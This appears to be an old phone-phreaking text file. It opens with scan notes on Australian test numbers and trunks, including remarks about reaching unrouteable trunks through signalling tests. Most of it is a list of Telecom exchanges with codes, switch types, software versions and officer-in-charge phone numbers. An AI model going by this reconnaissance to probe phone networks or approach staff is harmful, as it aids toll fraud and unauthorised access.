15363 1100 faults (Bendigo)
15366 Emergency (police or fire brigade etc)
15367 Emergency etc
15368 Emergency etc
15369 Emergency etc
15390 1100 faults (Canberra)
15393 Engaged signal..
15719 subscriber trunk calling is not available."
15715 engaged ??"
15721 "Good morning, operator assistance."
15722 Brisbane
15723 1100 faults (Brisbane)
15723 Brisbane
15724 Brisbane
15725 Brisbane
15726 Brisbane
15727 Brisbane
15733 Ipswich
15740 engaged"
15741 engaged"
15742 engaged"
15743 engaged
15744 engaged
15745 engaged
15747 inward trunk"
15771 "
15772 "
15783 "
15798 subscriber trunk"
15810 inward on both 06 & 08"
15820 Adelaide
15827 sounded 'Kaneena' exchange (must be in Adelaide)
15828 1100 faults (Adelaide)
15840 cannot complete call expects extra digits
15842 must check out to see if they are
15843 used for international operators. Not yet proved or disproved.
15844 Used over dial to connect. The line timed out and i ended up
15845 with an unrouteable trunk. Very simular to STD trunks.
15846 I think that they are Intercept Centre Trunks.
15847 Will do some MFC backward signalling tests. Extra digits may to connect
15848 may be part of the test network routeing.
15849 to
15881 Darwin
15921 Perth
15923 1100 faults (Perth)
15970 inward
15973 inward
15983 inward
15987 quite inward????"


  | The deffinative Australian exchange list |
  |    *          By Bigfoot        *****    |
  |   * * ------------>-------------  **     |
  |  *****           and             **      |
  | *     *                         *****    |
  |           The Chthonic Hvee              |

[ Editor ]

 Here is a nice _little_ list of Telescum exchanges. I hope you like it. If
there are any omissions, don't tell me, tell Telescum.

Note, OIC = Officer In Charge.

 /EXCHANGE\            /EQUIPMENT\                   /OIC\
CODE      NAME       TYPE         VERSION             PHONE    NODAL AREA
----	  ----	     ----         -------             -----    ----------

ABAY Apollo Bay      ARK  ARK-M                    052 376206  GEEX/MOLP
ABEE Allambee        SXS  APO-C                    056 33 1067 WGUX
ABES Allambee South  SXS  APO-C                    056 68 7211 WGUX
ABRY Aaubrey         SXS  APO-C                    053 981067  HORX
ADEA Adelaide 1      10C
ADEB Adelaide 2      ARM
AESK Archies Creek   ARK  ARK-M                    056 72 1067 MWRX
AKIE Anakie          ARK  ARK-M                    052 781067  GEEX/MOLP
ALBA Albury STE      ARM
ALBC Albury MSE      ARF
ALBE Albury Node     AXE
ALBY Albury          ARF
ALET Aireys Inlet    ARK  ARK-D                    052 891206  GEEX/MOLP
ALEY Apsley          ARK  ARK-M                    055 85 1067 HMOX
ALFX Alfredton       AXE  RSS-D                    053 37 0292 BRAX
ALSG Alice Springs   AXE
ALTA Altona          ARE  113                      03 391 1067 FOOTSCRAY
AMPH Amphitheatre    ARK  ARK-M                    054 61 1067 BGNX
AMPK Alma Park       ARK  ARK-D
AMSC Adelaide CMTS   AXE
ANCH Anabranch       ARK  ARK-M                    050 238 729 MILX
ANEL Avenel 104      AXE  104                      057 92 1067 WANX
ANNO Annuello        ARK  ARK-D                    050 26 3939 SWIX
AONA Ardmona 104     AXE  104                      058 21 2067 SHPX
APOX Apollo Bay 104  AXE  104                      052 37 6206 GEEX/MOLP
APPI Appin South     ARK  ARK-D                    054 52 1067 BGNX
ARAC Ararat MSE      ARF  REG-LP PRE REMO          053 521067  BRAX
ARAT Ararat          ARF  REG-LP PRE REMO          053 521067  BRAX
ARAX Ararat Node     AXE  1030208/77               053 521067  BRAX
ARCI Arcadia         ARK  ARK-M                    058 21 2067 SHPX
ARCK Arthurs Creek   ARK  ARK-M                    03 718 1067 IVANHOE
ARGA Areegra         SXS  APO-C                    053 981067  HORX
ARTA Arawata         ARK  ARK-M                    056 55 1067 MWRX
ASCT Ascot           ARE  113                      03 370 1067 FOOTSCRAY
ASEA Anglesea        ARK  D/M                      052 891206  GEEX/MOLP
ASEX Anglesea 104    AXE  104                      052 224400  GEEX/MOLP
AVIE Alvie           ARK  ARK-M                    052 312067  GEEX/MOLP
AVOA Avoca           ARK  ARK-M                    054 61 1067 BGNX
AXDA Alexandra       ARF  REG-LP PRE REMO          057 72 1067 SEYX
AXDC Alexandra MSE   ARF  REG-LP PRE REMO          057 72 1067 SEYX
AXEE Axedale         ARK  ARK-M                    054 43 1067 BGNX
AXEK Axe Creek       ARK  ARK-M                    054 43 1067 BGNX
BABT Bringalbert Sth ARK  ARK-M                    055 85 1067 HMOX
BABX Batman B Node   AXE  1030208/36               03 614 1067 CBD
BACA Bacc Marsh MSE  ARF  REG-LP PRE REMO          053 672067  BRAX
BACC Bacchus Marsh   ARF  REG-LP PRE REMO          053 672067  BRAX
BACX Bac.Marsh 104   AXE  104                      053 672067  BRAX
BACY Bacchus         AXE			   053 67 2067 BRAX
BADA Baranduda       ARK  ARK-D
BAGA Barooga         ARK  ARK-M                    058 72 1067 SHPX
BAIC Bairnsdale MSE  ARF  REG-LP PRE REMO          051 52 3067 BAIX
BAIR Bairnsdale      ARF  REG-LP PRE REMO          051 74 7999 BAIX
BAIX Bairnsdale MSE  AXE  1030208/77               051 52 3067 SALG
BALC Balaclava       SXS  2000                     03 527 1067 WINDSOR
BALI Balliang        SXS  APO-C                    053 672067  BRAX
BALN Ballan          ARK  ARK-M                    053 672067  BRAX
BALO Balmoral        ARK  ARK-M                    055 730249  HMOX
BALT Balaclava SXS T SXS  2000                     03 527 1067 WINDSOR
BAMA Bamawm          ARK  ARK-M                    054 82 1067 BGNX
BAMG Bamganie        ARK  ARK-M                    052 781067  GEEX/MOLP
BANY Banyena         ARK  ARK-M                    053 825067  HORX
BARM Barmah          ARK  ARK-D                    058 62 1067 SHPX
BARO Barongarook     ARK  ARK-D                    052 312067  GEEX/MOLP
BASS Bass            ARK  ARK-M                    056 72 1067 MWRX
BATI Batman 1 ISDN   AXE
BATM Batman          SXS  2000                     03 614 1067 CBD
BATX Batman A Node   AXE  1010606/17               03 614 1067 CBD
BAWN Bayswater North AXE  RSS-D                    03 725 1067 CROYDON
BAWW Baw Baw         ARF  RCEE                     051 34 1067 MWRX
BAXR Baxter          ARE  114                      03 784 2410 DROMANA
BAYL Bayles          ARK  ARK-M                    059 41 1067 DANDENONG
BAYN Baynton         ARK  ARK-D                    054 22 1067 BGNX
BAYR Bayswater       ARE  113                      03 729 1067 CAMBERWELL
BBRN Bannockburn     ARK  ARK-M                    052 781067  GEEX/MOLP
BDGE Baddaginnie     ARK  ARK-D                    057 61 1374 WANX
BDOR Bungador        SXS  APO-C/D                  052 312067  GEEX/MOLP
BDWS Broadmeadows    ARE  113                      03 338 1067 FOOTSCRAY
BEAC Beeac           ARK  ARK-M                    052 312067  GEEX/MOLP
BEAL Bealiba         ARK  ARK-M                    054 61 1067 BGNX
BEAU Beaumaris       ARF  REG-LM (SR-B)            03 589 1067 WINDSOR
BEBA Benambra        ARK  ARK-M                    051 59 1309 SALG
BECU B'field Upper   AXE  104                      059 41 1067 DANDENONG
BEDN Bonnie Doon     ARK  ARK-M                    057 75 2067 SEYX
BEFT Beech Forest    ARK  ARK-M                    052 312067  GEEX/MOLP
BELG Belgrave        ARE  113                      03 754 2067 DANDENONG
BELM Belmont         ARE  113                      052 431067  GEEX/MOLP
BELX Belmont RSS     AXE  RSS-D                    052 431067  GEEX/MOLP
BEMM Bemm River      ARK  ARK-M                    051 54 1067 BAIX
BENA Bena            ARK  ARK-M                    056 55 1067 MWRX
BENB Bendigo MSE     ARF  REG-LP PRE REMO          054 43 1067 BGNX
BEND Bendigo         ARF  REG-LP REMO              054 43 1067 BGNX
BENJ Benjeroop       ARK  ARK-D                    054 52 1067 BGNX
BENT Bentleigh       SXS  2000                     03 557 1067 WINDSOR
BENW Bendigo Iterra  AXE  NEC EQUIPMENT            054 405353  BGNX
BENX Bendigo RSS     AXE  RSS-D                    054 43 1067 BGNX
BENY Benayeo         SXS  APO-C                    055 85 1067 HMOX
BERK Berrys Creek    SXS  APO-C                    056 62 4067 MWRX
BERL Berrambool      ARK  ARK-M                    053 521067  BRAX
BESS Bessiebelle     SXS  APO-C&D                  055 730249  HMOX
BETT Bet Bet         ARK  ARK-D                    054 61 1067 BGNX
BEUL Beulah          ARK  ARK-M                    053 981067  HORX
BEVD Beverford       ARK  ARK-D                    050 324567  SWIX
BEWK Berwick         ARE  113                      03 704 6399 DANDENONG
BEXT Bamawm Ext      ARK  ARK-M                    054 82 1067 BGNX
BFOT Beaufort        ARK  ARK-M                    053 521067  BRAX
BGHC Bright MSE      ARF  REG-LP PRE REMO          057 55 1067 WANX
BGHT Bright          ARF  REG-LP PRE REMO          057 55 1067 WANX
BGHX Bright 104      AXE  104                      057 55 1067 WANX
BGNA Bendigo MSE     10C			   054 421067  BGNX
BGNW Bendigo Trunk   AXE  1030208/77               054 41 4411 BGNX
BGNX Bendigo Node    AXE  1010606/17               054 421067  BGNX
BGON Brighton        ARE  113                      03 528 1067 WINDSOR
BGRA Berringama      ARK  ARK-D
BGRG Bangerang       SXS  APO-C                    053 981067  HORX
BHAM Barham          ARK  ARK-M                    054 52 1067 BGNX
BHAX Barham 104      AXE  AXE-104                  054 52 1067 BGNX
BHGA Bethanga        ARK  ARK-D
BHLX Box Hill B Node AXE  1031008/36               03 899 1099 BOX HILL
BIGA Biggara         SXS  APO-C
BIRA Birregurra      ARK  ARK-M                    052 312067  GEEX/MOLP
BIRP Birchip         ARK  ARK-M                    054 95 1067 BGNX
BJRG Barjarg         ARK  ARK-M                    057 75 2067 SEYX
BKAR Bookar          SXS  APO-C&D                  055 93 1067 WBOX
BKLN Brooklyn        ARE  113                      03 689 1067 FOOTSCRAY
BLAD Blackwood       ARK  ARK-D                    053 672067  BRAX
BLAR Blairegowrie    AXE  RSS-D                    03 784 2268 DROMANA
BLBC Blackburn T/S   ARF  			   03 878 1067 BOXL
BLBN Blackburn       ARE  113                      03 878 1067 BOX HILL
BLDE Balldale        ARK  ARK-D
BLNG Bundalong       ARK  ARK-M                    057 44 3067 WANX
BLOH Bullioh         SXS  APO-C
BLRA Boolarra        ARK  ARK-D                    051 34 1067 MWRX
BLRN Ballyrogan      ARK  ARK-M                    053 521067  BRAX
BLTE Boolite         ARK  ARK-M                    053 981067  HORX
BMBT Burrumbeet      SXS  APO-C                    053 370292  BRAX
BMNE Burramine       ARK  ARK-D                    057 44 3067 WANX
BNAH Bungowannah     ARK  ARK-D
BNBA Bunbartha       ARK  ARK-M                    058 21 2067 SHPX
BNDS Barwon Downs    ARK  ARK-D                    052 312067  GEEX/MOLP
BNEA Brisbane 2-10C  10C
BNEB Brisbane 3-10C  10C
BNED Brisbane 1-ARM  ARM
BNGT Bringalbert     SXS  APO-C                    055 85 1067 HMOX
BNGX B'narring 104-1 AXE  104                      03 784 2298 DROMANA
BNHD Barwon Heads    ARK  ARK-M                    052 431067  GEEX/MOLP
BNLA Benalla         ARF  REG-LP PRE REMO          057 61 1374 WANX
BNLC Benalla MSE     ARF  REG-LP PRE REMO          057 62 1067 WANX
BNRG B'narring 104-2 AXE			   03 784 2298 DROMANA
BNWA Barnawartha     ARK  ARK-D
BOAA Boomanoomana    SXS  APO-C 7 SHPX
BOHO Boho South      ARK  ARK-M                    057 95 2067 SEYX
BOIS Boisdale        ARK  ARK-D                    051 47 1067 SALG
BOLD Bolinda         ARK  ARK-M                    054 22 1067 BGNX
BONA Boronia         ARE  113                      03 762 1067 CAMBERWELL
BOOR Boort           ARK  ARK-M                    054 52 1067 BGNX
BOOS Boolarong       ARK  ARK-D                    056 82 2067 MWRX
BORV Buffalo River   SXS  APO-C                    057 55 1067 WANX
BOSE Boosey          ARK  ARK-D                    058 72 1067 SHPX
BOWN Bowna           SXS  APO-C
BOXL Box Hill A Node AXE  1010606/17               03 899 1099 BOX HILL
BRAF Ballarat MSE    ARF  REG-LP PRE REMO          053 370373  BRAX
BRAS Ballarat ARM    ARM			   053 370373  BRAX
BRAT Ballarat        ARF  REG-LM                   053 370375  BRAX
BRAX Ballarat Node   AXE  1030208/77               053 37 0373 BRAX
BRBK Burrumbuttock   ARK  ARK-D
BREP Barep           ARK  ARK-D                    058 52 1067 SHPX
BRER Bridgewater-Tas 10C
BRHE Branxholme      ARK  ARK-D                    055 730249  HMOX
BRIA Briagolong      ARK  ARK-M                    051 47 1067 SALG
BRID Bridgewater     ARK  ARK-M                    054 43 1067 BGNX
BRIM Brim            ARK  ARK-M                    053 981067  HORX
BRKK Breakaway Creek AXE  RCM                      055 730249  HMOX
BROC Brocklesby      SXS  APO-C
BROD Broadwater      ARK  ARK-D                    055 730249  HMOX
BRON Broughton       ARK  ARK-M                    053 911067  HORX
BROX Broadford 104   AXE  104                      057 821 067 WANX
BRPN Brimpaen        SXS  APO-C                    053 825067  HORX
BRUC Brucknell       ARK  ARK-D                    055 93 1067 WBOX
BRUG Bruaong         ARK  ARK-D
BRUK Brunswick       ARE  113                      03 387 1067 FOOTSCRAY
BRUT Bruthen         ARK  ARK-M                    051 52 3067 BAIX
BRUX Brunswick Node  AXE  1030206/91               03 388 1067 FOOTSCRAY
BRWT Barwite         SXS  APO-C                    057 75 2067 SEYX
BTCX Batman C Node   AXE  1020208/36               03 614 1067 CBD
BTON Bannerton       ARK  ARK-M                    050 26 3939 MILX
BTSC Bathurst-Tas.   ARF
BTSQ Bathurst Launc. AXE
BUAN Buangor         SXS  APO-C                    053 521067  BRAX
BUCH Buchan          ARK  ARK-M                    051 52 3067 BAIX
BUCK Buckrabanyule   SXS  APO-C                    054 95 1067 BGNX
BUEN Bulleen         ARE  113                      03 859 1067 BOX HILL
BUFF Buffalo         SXS  APO-C                    056 63 6211 MWRX
BUIF Burnie Tandem   10C
BUIQ Burnie - Tas.   AXE
BULE Bullengarook    ARK			   ARK-M054 22 10 7 BGNX
BULL Bulla           ARK  ARK-D                    03 338 1067 FOOTSCRAY
BULS Bullarto        SXS  APO-C                    053 482067  BRAX
BULT Bulart          ARK  ARK-D                    055 730249  HMOX
BUNA Bundoora        ARF  REG-LM                   03 467 1067 IVANHOE
BUNI Buninyong       ARK  ARK-M                    053 370294  BRAX
BUNO Bunnaloo        ARK  ARK-M                    054 82 1067 BGNX
BUNY Bunyip          ARK  ARK-M                    056 23 5067 WGUX
BURW Burwood         ARE  113                      03 808 1067 CAMBERWELL
BURX Burwood A Node  AXE  1030206/91               03 808 1067 CAMBERWELL
BUYE Burrowye        ARK  ARK-D
BUYX Buninyong 104   AXE  104                      053 370294  BALLAARAT
BWDB Burwood B Node  AXE  1020208/36               03 808 1067 CAMBERWELL
BWLK Berriwillock    ARK  ARK-M                    050 70 1067 SWIX
BWTH Beechworth      ARK  ARK-D                    057 21 6067 WANX
BWTX Beechworth 104  AXE  104                      057 21 6067 WANX
BXHL Box Hill        SXS  2000                     03 878 1067 BOX HILL
BYAD Byaduck         ARK  ARK-M                    055 730249  HMOX
BYBD Boundary Bend   ARK  ARK-M                    050 26 3939 MILX
BYBK Berrybank       SXS  APO-C&D                  055 93 1067 WBOX
BYEO Boyeo           ARK  ARK-D                    053 911067  HORX
BYKN Byaduck North   SXS  APO-C&D                  055 730249  HMOX
BYRN Byrneville      SXS  APO-C                    053 825067  HORX
BZLY Beazleys Bridge ARK  ARK-M                    054 95 1067 BGNX
CABC Carranballac    SXS  APO-C                    053 370294  BRAX
CAGK Cabbage Tree Ck ARK  ARK-M                    051 54 1067 BAIX
CALI Calivil         ARK  ARK-M                    054 43 1067 BGNX
CANE Coleraine       ARF  REG-LP PRE REMO          055 730249  HMOX
CANI Caniambo        ARK  ARK-M                    058 21 2067 SHPX
CANR Cann River      ARK  ARK-M                    051 54 1067 BAIX
CAPP Cape Patterson  ARK  ARK-D                    056 72 1067 MWRX
CAPS Cape Schanck    SXS
CAPX Cape Paterson   AXE  104                      056 72 1067 MWRX
CARI Carisbrook      ARK  ARK-D                    054 61 1067 BGNX
CARP Carwarp         ARK  ARK-M                    050 241067  MILX
CARU Carrajung       ARK  ARK-D                    051 74 1067 TAGX
CASE Castlemaine     ARF  REG-LM                   054 72 1067 BGNX
CASF Castlemaine MSE ARF  REG-LM                   054 72 1067 BGNX
CASX Castlemaine 104 AXE  104                      054 721067  BGNX
CATA Catani          ARK  ARK-D                    056 23 5067 WGUX
CAUL Caulfield       ARE  113                      03 571 1067 WINDSOR
CAUT Caulfield T/S   ARF			   03 571 1067 WINDSOR
CAVE Cavendish       ARK  ARK-M                    055 730249  HMOX
CBAA Canberra Trunk  ARM
CBAB Canberra        AXE
CBAT Canberra CMTS   AXE
CBNC Cranbourne MSE  ARF  REG-LP REMO              059 961067  DANDENONG
CBNE Cranbourne      ARF  REG-LP REMO              059 96 1067 DANDENONG
CBNK Clydebank       ARK  ARK-D                    051 44 2067 SALG
CBNN Cranbourne Nth  AXE  RSS-D                    059 96 1067 DANDENONG
CBNX Cranbourne RSS  AXE  RSS-D                    059 961067  DANDENONG
CBOR Carboor         SXS  APO-C                    057 21 6067 WANX
CBRG Coburg          ARE  113                      03 354 1067 FOOTSCRAY
CBWR Cape Bridgewter SXS  APO-C&D                  055 231067  HMOX
CCLR Cape Clear      ARK  ARK-D                    053 370294  BRAX
CDIA Cardinia        ARK  ARK-D                    059 96 1067 DANDENONG
CDWB Camperdown ARM  ARM			   055 931067  WBOX
CDWC Camperdown MSE  ARF  REG-LP REMO              055 931067  WBOX
CDWN Camperdown      ARF  REG-LP REMO              055 931067  WBOX
CERE Ceres           ARK  ARK-M                    052 431067  GEEX/MOLP
CFLD Campbellfield   AXE  RSS-D                    03 359 1067 FOOTSCRAY
CGAN Cardigan        ARK  ARK-M                    053 370292  BRAX
CGWA Cudgewa         ARK  ARK-D
CHCH Churchill       AXE
CHET Chetwynd        SXS  APO-C&D                  055 81 1067 HMOX
CHHL Churchhill      ARF  REG-LP REMO CCR          051 34 1067 MWRX
CHIK Chinkapook      ARK  ARK-D                    050 26 3939 SWIX
CHIL Childers        SXS  APO-C                    056 33 1067 WGUX
CHTA Chatsworth      ARK  ARK-M                    053 521067  HORX
CHTI Charlotte IN    AXE  NORTEL
CHTN Chiltern        ARK  ARK-D                    057 21 6067 WANX
CINC Coleraine MSE   ARF  REG-LP PRE REMO          055 730249  HMOX
CKDA Cookardinia     ARK  ARK-M
CLAY Clayton         ARE  114                      03 544 1067 WINDSOR
CLBE Club Terrace 2  ARF  RCEE                     051 54 1067 BAIX
CLBK Coral Bank      ARK  ARK-D                    057 55 1067 WANX
CLDS Crowlands       ARK  ARK-M                    053 521067  HORX
CLGA Culgoa          ARK  ARK-M                    050 70 1067 SWIX
CLLR Carlisle River  ARK  ARK-D                    052 312067  GEEX/MOLP
CLNR Clayton North   AXE  RSS-D                    03 541 7390 WINDSOR
CLRL Clear Lake      ARK  ARK-M                    053 825067  HORX
CLTY Clayton Y Tand  ARF                           03 544 1067 WINDSOR
CLUN Clunes          ARK  ARK-M                    053 370292  BRAX
CLYD Clyde           ARK  ARK-D                    059 96 1067 DANDENONG
CMDX Carrum Downs    AXE  RSS-D                    03 784 2410 DANDENONG
CMLL Camberwell      ARF  REG-LP REMO CCR          03 813 1067 CAMBERWELL
CMPS Campbelltown    ARK  ARK-D                    054 72 1067 BGNX
CMUT Caramut         ARK  ARK-D                    055 93 1067 WBOX
CNBR Coonooer Bridge ARK  ARK-M                    054 95 1067 BGNX
CNDA Collendina      ARK  ARK-D
COBC Cobram MSE      ARF  REG-LP PRE REMO          058 72 1067 SHPX
COBD Cobden          ARK  ARK-D                    055 93 1067 WBOX
COBM Cobram          ARF  REG-LP PRE REMO          058 72 1067 SHPX
COBR Cobrico         ARK  ARK-D                    055 93 1067 WBOX
COBX Cobram 104      AXE  104                      058 72 1067 SHPX
COCK Cockatoo        ARK  ARK-D                    059 68 3067 DANDENONG
COGK Coghills Creek  ARK  ARK-D                    053 370292  BRAX
COHU Cohuna          ARK  ARK-M                    054 52 1067 BGNX
COLA Colac           ARF  REG-LP PRE REMO          052 312067  GEEX/MOLP
COLB Colbinabbin     ARK  ARK-M                    054 43 1067 BGNX
COLC Colac 104       AXE  104                      052 312067  GEEX/MOLP
COLD Coldstream      AXE  RSS-D                    03 724 2246 CAMBERWELL
COLF Colac MSE       ARF  REG-LP PRE REMO          052 312067  GEEX/MOLP
COMB Combienbar      SXS  APO-B                    051 54 1067 BAIX
COND Condah          ARK  ARK-D                    055 730249  HMOX
COOJ Coojar          ARK  ARK-M                    055 73 0249 HMOX
COPE Cope Cope       ARK  ARK-M                    054 95 1067 BGNX
COPP Coppabella      ARK  ARK-D
CORE Coreen          ARK  ARK-D
CORI Corio           ARE  114                      052 781067  GEEX/MOLP
CORK Cororooke       ARK  ARK-M                    052 312067  GEEX/MOLP
CORO Corop           ARK  ARK-M                    054 82 1067 BGNX
CORX Corio RSS       AXE  RSS-D                    052 781067  GEEX/MOLP
COWA Corowa          ARF
COWC Corowa MSE      ARF
COWE Cowangie        ARK  ARK-M                    050 92 1067 MILX
COWW Cowwarr         ARK  ARK-M                    051 47 1067 SALG
COWX Cowes 104 No.1  AXE  104                      059 521067  DROMANA
COWY Cowes 104 No.2  AXE  104                      059 521067  DROMANA
CRBN Craigieburn     ARE  114                      03 308 1067 FOOTSCRAY
CRBX Crib Pt. 104 -2 AXE  104                      03 784 2298 DROMANA
CRBY Canterbury      ARE  113                      03 836 1067 CAMBERWELL
CRCE Club Terrace 1  ARK  ARK-M                    051 54 1067 BAIX
CRCK Creightons Ck   SXS  APO-C                    057 95 2067 SEYX
CRES Creswick        ARK  ARK-M                    053 370292  BRAX
CREX Creswick 104    AXE  104                      053 370292  BRAX
CRHC Croydon C Node  AXE			   03 725 1067 CAMBERWELL
CRHX Croydon A Node  AXE  1010606/17               03 725 1067 CAMBERWELL
CRIB Crib Pt. 104 -1 AXE  104                      03 784 2298 DROMANA
CRIN Corinella       AXE  104                      056 72 1067 MWRX
CRKE Corack East     ARK  ARK-M                    054 95 1067 BGNX
CRLN Charlton        ARK  ARK-M                    054 95 1067 BGNX
CRME Cooriemungle    ARK  ARK-D                    055 93 1067 WBOX
CROH Croydon Hewish  ARF  REG-LP PRE REMO          03 725 1067 CAMBERWELL
CROR Crooked River   SXS  APO-B                    051 47 1067 SALG
CROX Croydon Tandem  ARF			   03 725 6067 CAMBERWELL
CROY Croydon         ARF  REG-LM                   03 723 1067 CAMBERWELL
CRPE Carapooee       ARK  ARK-D                    054 95 1067 BGNX
CRSY Cressy          ARK  ARK-M                    052 312067  GEEX/MOLP
CRYF Corryong MSE    ARF
CRYG Corryong        ARF
CRYM Crymelon        SXS  APO-C                    053 981067  HORX
CSEA Chelsea         ARE  113                      03 784 2410 DANDENONG
CSNT Cheshunt        ARK  ARK-M                    057 21 6067 WANX
CSTC Casterton MSE   ARF  REG-LP PRE REMO          055 811067  HMOX
CSTN Casterton       ARF  REG-LP PRE REMO          055 811067  HMOX
CSTX Casterton 104   AXE  104                      055 811067  HMOX
CSUG Casuarina       AXE
CTAM Cheltenh        ARE  113                      03 583 1067 WINDSOR
CTON Carlton         ARE  113                      03 347 1067 FOOTSCRAY
CULC Culcairn        ARK  ARK-D
CULL Cullulleraine   ARK  ARK-M                    050 23 8729 MILX
CUNK Cunninyeuk      SXS  APO-C                    050 32 4567 SWIX
CURL Curlwaa         ARK  ARK-M                    050 23 8729 MILX
CURY Curyo           SXS  APO-C                    050 70 1067 SWIX
CVIE Canberra        AXE
CVIF Canberra        10C
CVII Canberra 1 ISDN AXE  1030210/25
CWDA Callawadda      ARK  ARK-M                    053 581067  BRAX
CWOD Collingwood     ARE  113/4                    03 419 1067 IVANHOE
CWOS Collingwood SXS SXS  2000                     03 419 1067 IVANHOE
CWOX Coll/wood Node  AXE			   03 419 1067 IVANHOE
DADS Dadswells B'dge ARK  ARK-M                    053 581067  BRAX
DAEQ Davey St-Hobart AXE
DAEX Davey ISDN      AXE  1020210/72
DAGO Dargo           ARK  ARK-M                    051 47 1067 SALG
DALI Darlimurla      ARK  ARK-D                    056 68 4211 MWRX
DAMS Melb Data MSSC4 AXE  1030208/95               03 526 1433 WINDSOR
DANB D'nong B Node   AXE			   03 797 9424 DANDENONG
DANC Dandenong Tand. ARF			   03 797 9424 DANDENONG
DAND Dandenong       ARE  113                      03 797 9424 DANDENONG
DANN Dandenong North ARE  113                      03 797 9424 DANDENONG
DANX D'nong A Node   AXE  1010606/17               03 797 9424 DANDENONG
DARL Darlington      SXS  APO-C&D                  055 93 1067 WBOX
DARM Darnum          ARK  ARK-D                    056 235067  WGUX
DARN Dareton         ARK  ARK-M                    050 238729  MILX
DART Dartmoor        ARK  ARK-D                    055 231067  HMOX
DAYL Daylesford      ARK  ARK-M                    053 482067  BRAX
DAYS Daysdale        ARK  ARK-D
DAYX Daylesford 104  AXE  104                      053 482067  BRAX
DBLA Dimboola        ARK  ARK-M                    053 825067  HORX
DDNG Dederang        ARK  ARK-D
DDNL Dundonnell      ARK  ARK-D                    055 93 1067 WBOX
DEAN Dean            ARK  ARK-D                    053 370292  BRAX
DEMA Deans Marsh     ARK  ARK-M                    052 312067  GEEX/MOLP
DENI Denison         ARK  ARK-M                    051 47 1067 SALG
DEOW Devon M'ows 104 AXE  104                      059 96 1067 DANDENONG
DERG Dergholm        ARK  ARK-M                    055 81 1067 HMOX
DERI Derrinallum     ARK  ARK-M                    055 93 1067 WBOX
DERQ Devonport-Tas.  AXE
DEST Diggers Rest    AXE  RSS-D                    03 744 1067 FOOTSCRAY
DEVL Devlins Bridge  ARK  ARK-D                    057 92 1067 SEYX
DIAP Diapur          ARK  ARK-M                    053 911067  HORX
DICK Diamond Creek   ARF  REG-LM                   03 718 1067 IVANHOE
DIGW Diggora West    ARK  ARK-D                    054 82 1067 BGNX
DIGY Digby           SXS  APO-C&D                  055 73 0249 HMOX
DILL Dingwall        ARK  ARK-D                    054 52 1067 BGNX
DILP Dilpurra        SXS  APO-C                    050 32 4567 SWIX
DIMS Melb Data MSSC1 AXE  1030208/95               03 526 1433 WINDSOR
DING Dingee          ARK  ARK-M                    054 43 1067 BGNX
DIPL Dinner Plain    ARK  ARK-M                    051 59 1309 BAIX
DIXK Dixons Creek    ARK  ARK-D                    03 735 1067 CAMBERWELL
DKII Canberra 2 ISDN AXE  1020210/72
DKIT Deakin-ACT      ARF
DKNE Canberra        AXE
DMSC Darwin CMTS     AXE
DMTH Dartmouth       SXS  APO-C
DNCT Doncaster East  ARE  113                      03 848 1067 BOX HILL
DNDS D'nong Sth RSS  AXE  RSS-D                    03 794 7067 DANDENONG
DNKD Dunkeld         ARK  ARK-D                    055 730249  HMOX
DNQC Deniliquin-NSW  ARF
DOLL Dollar          SXS  APO-C                    056 64 4299 MWRX
DOMS Melb Data MSSC3 AXE  1030208/95               03 526 1433 WINDSOR
DONA Donald          ARK  ARK-M                    054 95 1067 BGNX
DONC Doncaster       ARE  113                      03 848 1067 BOX HILL
DONE Donald East     ARK  ARK-M                    054 95 1067 BGNX
DOOE Dooen           ARK  ARK-M                    053 825067  HORX
DOOK Dookie          ARK  ARK-M                    058 21 2067 SHPX
DORO Dorodong        SXS  APO-B                    055 81 1067 HMOX
DOUG Douglas         ARK  ARK-D                    055 85 1067 HMOX
DPDE Deepdene        SXS  2000                     03 817 1067 BOX HILL
DRIF Driffield       SXS  APO-C                    051 34 1067 MWRX
DRMA Drummond        ARK  ARK-M                    054 22 1067 BGNX
DRMT Derrimut        ARK  ARK-D                    03 369 1067 FOOTSCRAY
DRNX Drouin 104      AXE  104                      056 23 5067 MWRX
DROC Dromana MSE     ARF  REG-LP PRE REMO          03 784 2254 DROMANA
DROM Dromana         ARF  REG-LP PRE REMO          03 784 2254 DROMANA
DROU Drouin          ARK  ARK-M                    056 23 5067 WGUX
DROX Dromana Node    AXE  1030208/77               03 784 2254 DROMANA
DRPK Deer Park       ARE  113                      03 366 1067 FOOTSCRAY
DRPW Deer Park West  AXE  RSS-D                    03 688 9474 FOOTSCRAY
DRUB Drumborg        ARK  ARK-M                    055 231067  HMOX
DRWF Darwin-NT       ARF
DRWG Darwin          AXE
DRYS Drysdale        ARK  ARK-M                    052 431067  GEEX/MOLP
DRYX Drysdale        AXE  RSS-D                    052 431067  GEEX/MOLP
DTGM Darrawiet Guim  ARK  ARK-D                    057 82 1067 SEYX
DUMB Dumbalk         ARK  ARK-M                    056 64 4299 MWRX
DUMN Dumbalk North   SXS  APO-C                    056 64 5411 MWRX
DUMS Melb Data MSSC2 AXE  1030208/95               03 526 1433 WINDSOR
DUNM Dunmunkle       ARK  ARK-D                    053 825067  HORX
DUNO Dunolly         AXE  104                      054 61 1067 BGNX
DUNR Dunrobin        ARK  ARK-M                    055 81 1067 HMOX
DUOX Durham Ox       ARK  ARK-M                    054 52 1067 BGNX
DURR Dhurringile     ARK  ARK-D                    058 21 2067 SHPX
EAHK Eaglehawk       ARF  REG-LP REMO CCR          054 43 1067 BGNX
EAHX Eaglehawk RSS   AXE  RSS                      054 43 1067 BGNX
EASK Sydney 2 ISDN   AXE  1030210/25
EBDN Ebden           ARK  ARK-D
ECHC Echuca MSE      ARF  REG-LP PRE REMO          054 82 1067 BGNX
ECHU Echuca          ARF  REG-LP PRE REMO          054 82 1067 BGNX
ECHX Echuca 104      AXE  104                      054 82 1067 BGNX
ECKL Ecklin          ARK  ARK-D                    055 93 1067 WBOX
ECLB CLDR Database 1 AXE
ECLC CLDR Database 2 AXE
ECLD CLDR Database 3 AXE
ECLF CLDR Database 4 AXE
ECUI Echuca Village  SXS  APO-C                    054 82 1067 BGNX
EDPK Eden Park       ARK  ARK-M                    03 404 1067 IVANHOE
EEMS Exhib CMTS      AXE  1030208/95               03 662 1067 CBD
EKDL Eskdale         ARK  ARK-D
EKET East Kew SXS T  SXS  2000                     03 859 1067 BOX HILL
EKEW East Kew        SXS  2000                     03 859 1067 BOX HILL
ELAM Ellam           SXS  APO-C                    053 981067  HORX
ELAX Elaine 104      AXE  104                      053 370292  BRAX
ELDA Eldorado        ARK  ARK-M                    057 21 6067 WANX
ELDN Eildon          ARK  ARK-M                    057 72 1067 SEYX
